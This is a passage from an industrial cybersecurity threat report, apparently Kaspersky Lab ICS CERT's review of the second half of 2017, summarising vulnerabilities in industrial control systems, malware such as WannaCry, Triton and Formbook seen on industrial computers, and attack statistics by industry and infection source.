equipment and that equipment's denial of service (DoS). 
Importantly, most vulnerabilities (265) can be exploited remotely without authentication and exploiting them does not require the attacker to have any specialized knowledge or superior skills.\n\nExploits have been published for 17 vulnerabilities, increasing the risk of their exploitation for malicious purposes.\n\n#### Vulnerable ICS components\n\nThe largest number of vulnerabilities were identified in:\n\n * SCADA/HMI components (88),\n * networking devices designed for industrial environments (66),\n * PLCs (52),\n * and engineering software (52).\n\nVulnerable components also include protection relays, emergency shutdown systems, environmental monitoring systems and industrial video surveillance systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130429/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-3.png>)\n\n_Distribution of vulnerabilities identified by ICS components_\n\n### Vulnerabilities in industrial protocols\n\nAn important part of ICS software security research in 2017 was identifying serious vulnerabilities in implementations of industrial protocols. Specifically, vulnerabilities were identified in the [implementation of the Modbus Protocol in Modicon series controllers](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>) (that vulnerability was assigned a CVSS v. 3 base score of 10), as well as in [implementations of the OPC UA protocol stack](<https://ics-cert.us-cert.gov/advisories/ICSA-17-243-01B>) and in an implementation of the [PROFINET Discovery and Configuration Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-129-01H>). 
The security issues identified affect entire product families.\n\n### Impact of vulnerabilities in 'traditional' technologies on industrial systems\n\nIn addition to ICS-specific vulnerabilities, a number of serious flaws were identified in H2 2017 in software platforms and network protocols that can be exploited to attack industrial systems.\n\nThe vulnerabilities in the WPA2 protocol unexpectedly turned out to be relevant to industrial solutions. They were found to [affect](<https://ics-cert.kaspersky.com/news/2017/11/15/ics-krack/>) equipment from several vendors, including Cisco, Rockwell Automation, Sierra Wireless, ABB and Siemens. Industrial control systems were also affected by multiple vulnerabilities in [the Dnsmasq DNS server](<https://ics-cert.kaspersky.com/news/2017/12/05/dnsmasq/>), [Java Runtime Environment](<https://ics-cert.us-cert.gov/advisories/ICSA-17-213-02>), [Oracle Java SE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-262-01>), and [Cisco IOS and IOS XE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-094-04>).\n\nVulnerabilities in Intel products can also affect the security of industrial equipment. In the second half of 2017, [information on several vulnerabilities in Intel products](<https://ics-cert.kaspersky.com/news/2017/11/24/intel-updates/>) (ME, SPS and TXE) was published. These vulnerabilities affect mainly SCADA server hardware and industrial computers that use vulnerable CPUs. These include, for example, Automation PC 910 by B&R, Nuvo-5000 by Neousys and the GE Automation RXi2-XP product line. As a rule, vendors do not consider it necessary to release public advisories on vulnerabilities of this type (derived from using third-party technologies). Of course, there are some positive exceptions. For example, Siemens AG has released [an advisory](<https://ics-cert.kaspersky.com/news/2018/03/01/siemens-intel/>) stating that these vulnerabilities affect a range of the company's products. 
Earlier, the company published [information](<https://cert-portal.siemens.com/productcert/pdf/ssa-874235.pdf>) about similar vulnerabilities in Intel technologies affecting its products.\n\n### IoT device vulnerabilities\n\n2017 was marked by a growing number of vulnerabilities being identified in internet of things (IoT) devices. As a consequence, such vulnerabilities were increasingly often exploited to create botnets. The activity of three new botnets was uncovered in the last two months of 2017 only. These included the [Reaper botnet](<https://ics-cert.kaspersky.com/news/2017/11/09/reaper/>) and new Mirai variants, including the [Satori botnet](<https://ics-cert.kaspersky.com/news/2017/12/14/satori/>).\n\nMultiple vulnerabilities were identified in [Dlink 850L routers](<https://blogs.securiteam.com/index.php/archives/3364>), [WIFICAM wireless IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>), [Vacron network video recorders](<https://blogs.securiteam.com/index.php/archives/3445>) and other devices.\n\nOn top of the new IoT device flaws, some old vulnerabilities are still not closed, such as [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) in Realtek devices and the vulnerability dating back to 2012 that can be exploited to get the configuration of [Serial-to-Ethernet converters](<https://www.bleepingcomputer.com/news/security/thousands-of-serial-to-ethernet-devices-leak-telnet-passwords/>), including the Telnet password, by sending a request on port 30718. The vulnerability in Serial-to-Ethernet converters directly affects the industrial internet of things (IIoT), since many systems that enable the operators of industrial equipment to remotely control its status, modify its settings and control its operation are based on serial interface converters.\n\nThe security of IoT devices is also affected by issues relating to the security of traditional information technology. 
Specifically, vulnerabilities in implementations of the Bluetooth protocol led to the emergence of the new attack vector, [BlueBorne](<https://ics-cert.kaspersky.com/news/2017/09/15/blueborne/>), which poses a threat to mobile, desktop and IoT operating systems.\n\n## Vulnerabilities identified by Kaspersky Lab ICS CERT\n\nIn 2017, Kaspersky Lab ICS CERT experts not only analyzed the security issues associated with different vendors' ICS components, but also focused on the common ICS components, platforms and technologies used in different vendors' solutions. This type of research is important because vulnerabilities in such components significantly increase the number of potential attack victims. Research in this area continues in 2018.\n\n### Number of vulnerabilities identified\n\nBased on its research, Kaspersky Lab ICS CERT identified 63 vulnerabilities in industrial and IIoT/IoT systems in 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130435/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-4.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby types of components analyzed_\n\nEvery time we identified a vulnerability, we promptly notified the respective product's vendor.\n\n### Number of CVE entries published\n\nDuring 2017, 11 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT. It should be noted that some of these CVE entries were published after vendors closed vulnerabilities information on which had been provided to them in 2016.\n\nInformation on other vulnerabilities identified by Kaspersky Lab ICS CERT experts will be published after these vulnerabilities are closed by the respective vendors.\n\n### Capabilities provided by the vulnerabilities identified\n\nThe largest number of vulnerabilities identified (29) could allow an attacker to cause denial of service (DoS) remotely. 
8% of the vulnerabilities identified could allow an attacker to execute arbitrary code remotely on the target system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130442/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-5.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby capabilities provided_\n\n### Vulnerabilities in ICS components\n\nIn 2017, Kaspersky Lab ICS CERT experts identified 30 vulnerabilities in ICS products from different vendors. These are mainly large automation system vendors, such as Schneider Electric, Siemens, Rockwell Automation, Emerson, and others.\n\n#### Severity ratings of the vulnerabilities identified\n\nTo assess the severity of vulnerabilities identified in ICS components, Kaspersky Lab ICS CERT used its own vulnerability rating system based on the metrics defined in [CVSS v3.0](<https://www.first.org/cvss/v2/faq>) (Common Vulnerability Scoring System) standard, with the following vulnerability severity levels identified:\n\n * least severe: CVSS v3.0 base score of 5.0 or less,\n * medium severity: CVSS v3.0 base score of 5.1 to 6.9 (inclusive),\n * most severe: CVSS v3.0 base score of 7.0 or more.\n\nThe absolute majority of vulnerabilities identified are in the most severe group. These include the [XXE vulnerability in industrial solutions](<https://ics-cert.kaspersky.com/news/2017/09/07/closing-an-xxe-vulnerability-in-siemens-industrial-solutions/>) that use the Discovery Service of the OPC UA protocol stack.\n\n#### Vulnerabilities in OPC UA implementations\n\nOne of the research areas involved searching for vulnerabilities in different implementations of the OPC UA technology. This type of research is needed to improve the overall security level of products from different vendors that use the technology in their solutions. 
Vulnerabilities in such technologies are a Swiss army knife of sorts for attackers, enabling them to hack industrial systems from different vendors.\n\nA total of 17 critical denial-of-service vulnerabilities were identified during the period.\n\nSome of the vulnerabilities were identified in sample software implementations of various OPC UA functions available in the official GitHub repository. In the process of communicating with several vendors of industrial automation systems, we found out that many of them had used code from such samples in their product code. This means that the vulnerabilities identified may affect complete product lines from different vendors.\n\n### Vulnerabilities in third-party hardware-based and software solutions\n\nKaspersky Lab ICS CERT experts have also analyzed third-party hardware-based solutions that are widely used in industrial automation systems.\n\nSpecifically, experts analyzed the SafeNet Sentinel hardware-based solution by Gemalto. As a result of the research, [15 vulnerabilities](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>) were identified in the software part of the solution (11 in December 2016 and 4 in 2017). These flaws affect a large number of products that use the vulnerable software, including solutions by ABB, General Electric, HP, Cadac Group, Zemax and other software developers, the number of which may reach 40 thousand, according to some estimates.\n\n### Vulnerabilities in internet of things (IoT and IIoT) components\n\nAnother area of research was the assessment of the information security status of internet of things (IoT) components, including industrial internet of things (IIoT) components.\n\nKaspersky Lab experts are working with vendors to improve the security of their solutions with respect to 11 vulnerabilities identified. 
Vulnerabilities were found in the following components and solutions:\n\n * smart cameras,\n * hardware-based IIoT solutions.\n\nIt should be noted that vulnerabilities in implementations of OPC UA standards, which are discussed above, also directly affect IIoT security.\n\n### Vulnerabilities in industrial routers\n\nIn the past year, 18 vulnerabilities were identified in industrial networking equipment from different vendors. Typical vulnerabilities: information disclosure, privilege escalation, arbitrary code execution, denial of service.\n\n### Working with software vendors\n\nWith respect to information on the vulnerabilities identified, Kaspersky Lab follows the principle of responsible information disclosure, promptly reporting vulnerabilities to the respective software vendors.\n\nIn 2017, Kaspersky Lab ICS CERT researchers actively collaborated with various companies to ensure that the vulnerabilities identified would be closed.\n\nOf the 63 vulnerabilities identified by Kaspersky Lab ICS CERT in 2017, vendors closed 26. Vulnerabilities were closed by Siemens, General Electric, Rockwell Automation, Gemalto and the [OPC Foundation](<https://en.wikipedia.org/wiki/OPC_Foundation>) industrial consortium.\n\nIt should be noted that most vendors of software for industrial automation systems that we have worked with have lately been devoting much more care and resources to the task of closing the vulnerabilities identified and fixing information security issues in their products, including their earlier versions.\n\nAt the same time, the issue of closing vulnerabilities in industrial automation systems remains relevant. In many cases, it takes large vendors a long time to close vulnerabilities in their products. 
Sometimes software vendors decide to patch only new versions of a vulnerable product, which they are planning to release in the future.\n\nIn addition, some vendors still need to improve the organizational and technical aspects of the procedures they use to inform customers about the vulnerabilities patched. Even after an update has been released, many users are unaware of the relevant security issue and use vulnerable versions of the product. This is particularly important for embedded software, as well as the technologies and specific program modules used by numerous third-party vendors (one example can be found [here](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>)).\n\nPositive examples include Siemens and the OPC Foundation, which have quickly closed the vulnerabilities identified and released public advisories on existing vulnerabilities.\n\n## Malware in industrial automation systems\n\nAs we have [mentioned before](<https://ics-cert.kaspersky.com/reports/2017/03/28/threat-landscape-for-industrial-automation-systems-in-the-second-half-of-2016/#3l3>), many industrial companies use modern networking technologies that improve the transparency and efficiency of enterprise management processes, as well as providing flexibility and fault tolerance for all tiers of industrial automation. As a result, industrial networks are increasingly similar to corporate networks \u2013 both in terms of use case scenarios and in terms of the technologies used. 
The unfortunate flip side of this is that internet threats, as well as other traditional IT threats, increasingly affect the industrial networks of modern organizations.\n\nIn the second half of 2017, Kaspersky Lab security solutions installed on industrial automation systems detected over 17.9 thousand different malware modifications from about 2.4 thousand different malware families.\n\n### Accidental infections\n\nIn the vast majority of cases, attempts to infect ICS computers are accidental and are not part of targeted attacks. Consequently, the functionality implemented in malware is not specific to attacks on industrial automation systems. However, even without ICS-specific functionality, a malware infection can have dire consequences for an industrial automation system, including an emergency shutdown of the industrial process. This was demonstrated by the WannaCry outbreak in May 2017, when several enterprises in different industries had to suspend their industrial processes after being infected with the encryption malware. We wrote about encryption malware-related threats in our [previous report](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/>) and several articles (see [here](<https://ics-cert.kaspersky.com/reports/2017/06/22/wannacry-on-industrial-networks/>) and [here](<https://ics-cert.kaspersky.com/alerts/2017/06/29/more-than-50-percent-of-organizations-attacked-by-expetr-petya-cryptolocker-are-industrial-companies/>)).\n\n#### Unexpected consequences of the WannaCry outbreak\n\nIt is important to note that some IT threats can do much more significant harm in an industrial network than in an office network. To demonstrate this, we look at two incidents investigated by the Kaspersky Lab ICS-CERT team.\n\nIn H2 2017, we were approached by several industrial enterprises at once, where mass infections of industrial networks with WannaCry encryption malware had been detected. 
It was later determined that the initial infections of office networks at the victim companies had in all the cases taken place back in the first half of 2017, at the height of the WannaCry outbreak. However, the infections were not noticed until the malware propagated to the enterprises' industrial networks. As it turned out during investigation, encryption functionality in the malware samples was damaged and the infected systems on corporate networks continued to operate normally, without any failures. However, the infection of industrial networks in these cases had unexpected negative consequences.\n\nAt one of the enterprises infected by WannaCry, the workstations used by operators started to bring up the Blue Screen of Death all the time, leading to emergency reboots. The reason for this unexpected consequence of infection was that the machines ran Windows XP. It is a well-known fact that the DoublePulsar exploit used by WannaCry to propagate causes Windows XP to crash, resulting in a Blue Screen of Death and a reboot. In cases when numerous machines in the industrial segment of an organization's network are infected, Windows XP machines are often attacked and go into emergency reboots. As a result, operators are rendered incapable of monitoring and controlling the industrial process. This makes WannaCry a denial-of-service attack tool of sorts.\n\nIn another incident, the propagation of WannaCry caused some of the devices on an enterprise's industrial network to become temporarily unavailable during periods when the network activity of the malware coincided with certain stages in the industrial process. 
This resulted in emergency interruptions of an industrial process that was critical for the enterprise for an average of 15 minutes.\n\n#### Cryptocurrency miners in industrial network infrastructure\n\nAccording to Kaspersky Lab ICS CERT data, cryptocurrency mining programs attacked 3.3% of industrial automation system computers during the period from February 2017 to January 2018.\n\nUp to August 2017, the percentage of ICS computers attacked by cryptocurrency miners did not exceed 1%. This figure grew in September and did not go back to less than 1% for the rest of 2017. In October, cryptocurrency miner attacks against ICS computers peaked, with 2.07% of ICS computers being attacked.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130449/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-6.png>)\n\n_Percentage of ICS computers attacked by cryptocurrency mining malware_\n\nLike other malware infecting systems at industrial enterprises, cryptocurrency miners can pose a threat to industrial process monitoring and control. In the process of its operation, malware of this type creates a significant load on the computer's computational resources. An increased load on processors can negatively affect the operation of the enterprise's ICS components and threaten their stability.\n\nAccording to our assessments, in most cases cryptocurrency miners infect ICS computers accidentally. There is no reliable information on machines that are part of the industrial network infrastructure being infected as a result of targeted attacks the goal of which is to mine cryptocurrencies, with the exception of cases when miners are installed by unscrupulous employees of victim enterprises. 
The cryptocurrency mining malware typically enters the industrial network infrastructure from the internet or, less commonly, from removable media or network shares.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130456/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-7.png>)\n\n_Sources of ICS computer infections with cryptocurrency miners \nPercentage of systems attacked, February 2017 \u2013 January 2018_\n\nCryptocurrency miners have infected numerous websites, including those of industrial companies. In such cases, cryptocurrencies are mined on the systems of users who visit infected web resources. This technique is called cryptojacking.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130503/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-8.png>)\n\n_Screenshot showing a fragment of code found on a web resource infected with mining malware_\n\n#### Botnet agents in the industrial network infrastructure\n\nIn most cases, the functionality of botnet agents includes searching for and stealing financial information, stealing authentication data, brute forcing passwords, sending spam, as well as conducting attacks on specified remote internet resources, including distributed denial-of-service (DDoS) attacks. In addition, in cases where a botnet agent attacks third-party resources (such cases have been detected), the companies that own the IP addresses from which the attacks are launched may face certain reputational risks.\n\nAlthough the destructive activity of botnet agents is not specifically designed to disrupt the operation of any industrial system, an infection with this type of malware may pose a significant threat to a facility that is part of the industrial infrastructure. Malware of this type can cause network failures, denial of service (DoS) of the infected system and other devices on the network. 
It is also common for malware to contain errors in its code and/or be incompatible with software used to control the industrial infrastructure, potentially resulting in the disruption of industrial process monitoring and control.\n\nAnother danger associated with botnet agents is that malware of this type often includes data collection functionality and, like backdoor malware, enables the attackers to control the infected machine surreptitiously. System data collected by bots by default is sufficient for accurately identifying the company that owns the system and the type of the infected system. What's more, access to machines infected with botnet agents is often put up for sale at specialized exchanges on the Darknet. Consequently, threat actors interested in infected industrial control systems can gain access to a victim company's sensitive data and/or systems used to control the industrial infrastructure.\n\nIn 2017, 10.8% of all ICS systems were attacked by botnet agents. Moreover, botnet agent attack statistics show that 2% of ICS systems were attacked by several malicious programs of this type at once.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130511/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-9.png>)\n\n_Percentage of ICS computers attacked by botnet agents in 2017_\n\nThe main sources of botnet agent attacks on ICS systems in 2017 were the internet, removable media and email messages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130518/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-10.png>)\n\n_Sources of ICS infection with botnet agents, percentage of ICS computers attacked, 2017_\n\nThis once again demonstrates the need for access control to ensure that information is exchanged securely between an enterprise's industrial network and other networks, as well as the need to block unauthorized removable media from connecting to ICS 
systems and to install tools designed to detect and filter malicious objects from email messages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130524/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-11.png>)\n\n_Top 5 botnet agents most commonly found on ICS systems in 2017, \npercentage of ICS computers attacked_\n\nNearly two percent of all systems analyzed were attacked with Virus.Win32.Sality malware. In addition to infecting other executable files, this malware includes the functionality of resisting antivirus solutions and downloading additional malicious modules from the command-and-control server. The most widespread Sality modules are components for sending spam, stealing authentication data stored on the system and downloading and installing other malware.\n\nThe Dinihou botnet agent, which attacked 0.9% of ICS systems analyzed, is in second position. The malware includes functionality that enables the attackers to upload an arbitrary file from an infected system, creating the threat of sensitive data leaks for victim organizations. In addition, both Worm.VBS.Dinihou and Virus.Win32.Nimnul, which is in third place with 0.88%, can be used to download and install other malware on infected systems.\n\nMost modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.\n\nThe fifth position is taken up by Backdoor.Win32.Androm, which ranked highest based on the number of attacks on ICS systems in H2 2016. 
The malware provides the attackers with a variety of information on the infected system and enables them to download and install modules for performing destructive activities, such as stealing sensitive data.\n\n### Targeted attacks\n\n2017 saw the publication of information on two targeted attacks on systems that are part of the industrial infrastructure \u2013 [Industroyer](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/#21>) and [Trisis/Triton](<https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>). In these attacks, for the first time since Stuxnet, threat actors created their own implementations of industrial network protocols, gaining the ability to communicate with devices directly.\n\n#### Trisis/Triton\n\nIn December 2017, researchers reported discovering previously unknown malware that targeted critical infrastructure systems. The discovery was made as a result of investigating an incident at an unnamed industrial enterprise. The malicious program was dubbed Triton or Trisis.\n\nThe malware is a modular framework that can automatically find Triconex Safety Controllers on the enterprise network, get information on their operating modes and plant malicious code on these devices. Trisis/Triton embeds a backdoor in the device's firmware, enabling the attackers to remotely read and modify not only the code of the legitimate control program, but also the code of the compromised Triconex device's firmware. With such capabilities, attackers can do serious damage to the enterprise's industrial process. The least harmful of possible negative consequences is the system's emergency shutdown and interruption of the industrial process. It was this type of event that caused a victim organization to launch an investigation, which resulted in the attack being detected.\n\nIt remains unknown how the attackers penetrated the enterprise's infrastructure. 
What is known is that they must have been inside the compromised organization's network for a sufficiently long time (several months) and used legitimate software and 'dual-use' utilities for lateral movement and privilege escalation.\n\nAlthough the attack was designed to modify code on Triconex devices, the code that the attackers were apparently trying to inject in the last stage of the attack has never been found, so it is currently impossible to determine the final objective of the attack.\n\n#### Spear phishing \u2014 Formbook spyware\n\nSpear phishing attacks on industrial organizations continued in the second half of 2017. We have already [written](<https://ics-cert.kaspersky.com/reports/2017/06/15/nigerian-phishing-industrial-companies-under-attack/>) about spear phishing used by threat actors in Business Email Compromise (BEC) attacks. Compared to attacks described earlier, the attackers' tactics have not changed significantly. However, in addition to known Trojan-Spy malware sent in phishing emails to global industrial and energy companies (FareIT, HawkEye, ISRStealer, etc.), a new representative of this malware class \u2013 Formbook \u2013 gained popularity in the second half of 2017.\n\nFormbook attacks involve sending phishing emails with malicious Microsoft Office documents attached. To download and install malware on target systems, these documents exploit the CVE-2017-8759 vulnerability or use macros. Some phishing emails include attached archives of different formats containing the malicious program's executable file. Examples of attached file names:\n\n * RFQ for Material Equipment for Aweer Power Station H Phase IV.exe\n * Scanned DOCUMENTS & Bank Details For Confirmation.jpeg (Pages 1- 4) -16012018. 
jpeg.ace\n * PO & PI Scan.png.gz\n * zip\n * QUOTATION LISTS.CAB\n * shipping receipts.ace\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130531/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-12.png>)\n\n_Sample phishing email used to distribute Formbook_\n\nIn terms of implementation and the techniques used to obfuscate the code and encrypt the payload, Formbook differs from its 'peers' in that its functionality is more extensive. In addition to standard spyware features, such as making screenshots, capturing keypresses and stealing passwords stored in browsers, Formbook can steal sensitive data from HTTP/HTTPS/SPDY/HTTP2 traffic and web forms. Additionally, the malware implements remote system control functionality and uses an unusual technique to resist the analysis of network traffic. The Trojan generates a set of URLs to which it is going to connect, using a list of legitimate domains stored in its body. It then adds one URL for its command-and-control server. In this way, the malware attempts to mask its connections to the malicious domain by sending numerous requests to legitimate resources, making its detection and analysis more difficult.\n\n## Threat statistics\n\n_All statistical data used in this report was collected using the [Kaspersky Security Network](<https://kas.pr/Gzu1>) (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions._\n\n### Methodology\n\nThe data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. 
This group includes Windows computers that perform one or several of the following functions:\n\n * supervisory control and data acquisition (SCADA) servers,\n * data storage servers (Historian),\n * data gateways (OPC),\n * stationary workstations of engineers and operators,\n * mobile workstations of engineers and operators,\n * Human Machine Interface (HMI).\n\nThe statistics analyzed also include data received from computers of industrial control network administrators and software developers who develop software for industrial automation systems.\n\nFor the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of _unique_ computers attacked to all computers in our sample from which we received anonymized information during the reporting period.\n\nICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.\n\nWorkstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.\n\nAs a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 40% of all machines have regular or full-time internet connections. 
The remaining machines connect to the Internet no more than once a month, many less frequently than that.\n\n### Percentage of computers attacked\n\nIn the second half of 2017, Kaspersky Lab products blocked attempted infections on **37.8%** of ICS computers protected by them, which is 0.2 percentage points more than in the first half of 2017 and 1.4 percentage points less than in the second half of 2016.\n\nJune \u2013 August 2017 saw a decline in the number of attacked computers. However, in September there was a notable increase in cybercriminal activity, with the proportion of attacked machines rising to 20% and not falling below that level again for the rest of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130539/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-13.png>)\n\n_Percentage of ICS computers attacked globally by month, 2017_\n\nWhen comparing these values with the same period in 2016, we see that the July numbers are practically identical. However, for all other months the percentage of attacked machines in 2016 was higher than in 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130545/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-14.png>)\n\n_Percentage of ICS computers attacked globally by month, H2 2017 vs H2 2016_\n\nA certain decrease in the percentage of computers attacked can be attributed to several factors. It is likely that one has to do with industrial enterprises paying more attention to the security of industrial segments on their networks. 
According to our experts' assessments, changes for the better may be largely due to simple measures: enterprises have begun to conduct audits of the industrial segments of their networks, train employees in the principles of cyber-hygiene, more properly differentiate access rights between the corporate and the industrial segments of their network, etc.\n\n### Percentage of ICS computers attacked in different industries\n\nAccording to our assessment, medium-size and large companies with mature IT security processes tend to use Kaspersky Lab corporate solutions (mainly Kaspersky Industrial CyberSecurity and Kaspersky Endpoint Security) to safeguard their ICS infrastructure. Many smaller organizations and individual engineers, along with companies whose IT and OT cybersecurity still leaves much to be desired, may rely on Kaspersky Lab consumer solutions to protect their ICS computers. The percentage of such computers attacked by malware during the reporting period is significantly higher compared to the corresponding figures for computers protected by corporate products.\n\nWe intentionally excluded statistics coming from our consumer solutions when analyzing attacks on industrial facilities in different industries, using only telemetry data coming from Kaspersky Lab products for corporate users. 
This resulted in lower average percentages of attacked computers than in the rest of the analysis results presented in this report, where both Kaspersky Lab corporate and consumer product statistics were used.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130552/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-15.png>)\n\n_Percentage of ICS computers attacked in different industries*, H2 2017 vs H1 2017_\n\n*In this report, unlike our previous reports, we calculated the percentage of attacked ICS computers for each industry (the percentage of ICS computers attacked in an industry to all ICS computers in that industry).\n\nIn previous reports, we included the distribution of attacked ICS computers by industry (the percentage of computers attacked in a given industry to all attacked computers in our sample).\n\nAccording to statistics on attacks against facilities in different industries, nearly all industries demonstrate similar percentages of attacked ICS computers, which are in the range from 26 to 30 percent. 
We believe this may be due to the similarity of ICS architectures used to automate industrial processes at enterprises in various industries and, possibly, similarities in the processes used by enterprises to exchange information with external entities and inside the enterprises themselves.\n\nTwo industries were attacked more than others during the reporting period: the figures for Energy (38.7%) and Engineering & ICS Integrators (35.3%) are above 35%.\n\nWe believe that the high percentage of attacked ICS systems in the energy sector may be explained, on the one hand, by the greater network connectivity of electric power sector facilities (compared to facilities in other industries) and, on the other hand, perhaps by the fact that, on average, more people have access to the industrial control systems of energy sector facilities than to those at enterprises in other industries.\n\nThe supply chain attack vector has infamously been used in some devastating attacks in recent years, which is why the high percentage of attacked ICS computers in Engineering and ICS Integration businesses is a problem that is serious enough to be noticed.\n\nThe only industry whose figures showed significant growth in the six months (+5.2 p.p.) is Construction (31.1%). The reason for the high percentage of ICS computers attacked in construction organizations could be that, for enterprises in the industry, industrial control systems often perform auxiliary functions, were introduced a relatively short time ago and are consequently at the periphery of company owners' and managers' attention. The upshot of this may be that objectives associated with protecting these systems from cyberthreats are regarded as having a relatively low priority. Whatever the reason for the high percentage of attacks reaching industrial control systems in construction and engineering, the fact seems sufficiently alarming. 
Construction is known to be a highly competitive business and cyberattacks on industrial organizations in this industry can be used as a means of unfair competition. So far, cyberattacks have been used in the construction industry mainly for purposes associated with the theft of commercial secrets. Infecting industrial control systems may provide threat actors with a new weapon in their fight against competitors.\n\nThe three least attacked industries are Mining (23.5%), Logistics & Transportation (19.8%) and ICS Software Development (14.7%).\n\nICS vendor infections might be very dangerous, because the consequences of an attack, spread over the infected vendor's partner ecosystem and customer base, could be dramatic, as we saw in recent wide-scale incidents such as the exPetr malware epidemic.\n\nThis report includes information on ICS computers at educational facilities. These figures include not only ICS systems used in demonstration stands and labs performing instructional and research functions, but also in industrial automation systems of various facilities that are part of the infrastructure of educational establishments, such as power supply systems (including power generation and distribution), utilities, etc., as well as ICS used in pilot production facilities.\n\nThe figure for educational establishments can be regarded as representing the \"background level\" of accidental threats affecting ICS systems, considering systems at educational establishments to be as insecure as such systems can get. 
This is because ICS systems at educational establishments are usually connected to the respective organizations' general-purpose networks and are less isolated from the outside world than the systems of industrial facilities.\n\nAt the same time, we believe that attacks on ICS systems at educational establishments can also pose a significant threat to enterprises in different real-sector industries \u2013 primarily because universities/colleges maintain working contacts and engage in collaboration with industrial enterprises. This includes joint research labs, engineering and development centers, personnel training and career development centers, etc.\n\nIn addition, such ICS systems can be used by attackers to test and debug malicious code and refine attacks against real-sector enterprises.\n\nEducation demonstrates the greatest difference between the H1 and H2 percentages of ICS systems attacked. The high figure for H1 was due to the large number of internet-borne attacks, as well as attacks by malware belonging to the [Trojan.Multi.Powercod](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>) family. That malware uses techniques that are similar to those described by our colleagues [here](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>). In H1 2017, 9.8% of ICS computers in educational establishments from our sample were attacked by Powercod Trojans. 
In H2, the corresponding figure was 0.7%.\n\n### Sources of industrial automation system infection\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130558/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-16.png>)\n\n_Main sources of threats blocked on ICS computers, \npercentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nIn the second half of 2017, most of the numbers for the main infection sources remained at H1 2017 levels.\n\nFor computers that are part of the industrial infrastructure, the internet remains the main source of infection. Contributing factors include interfaces between corporate and industrial networks, availability of limited internet access from industrial networks, and connection of computers on industrial networks to the internet via mobile phone operator networks (using mobile phones, USB modems and/or Wi-Fi routers with 3G/LTE support). Contractors, developers, integrators and system/network administrators that connect to the control network externally (directly or remotely) often have unrestricted internet access. Their computers are in the highest-risk group and can be used by malware as a channel for penetrating the industrial networks of the enterprises they serve. As we mentioned above, about 40% of computers in our sample connect to the internet on a regular basis. It should be noted that, in addition to malicious and infected websites, the \"Internet\" category includes phishing emails and malicious attachments opened in web-based email services (in browsers).\n\nExperts from Kaspersky Lab ICS-CERT note that malicious programs and scripts built into email message bodies are often used in targeted attacks on industrial enterprises. In most cases, the attackers distribute emails with malicious attachments in office document formats, such as Microsoft Office and PDF, as well as archives containing malicious executable files.\n\nThere has also been a 1.7 p.p. 
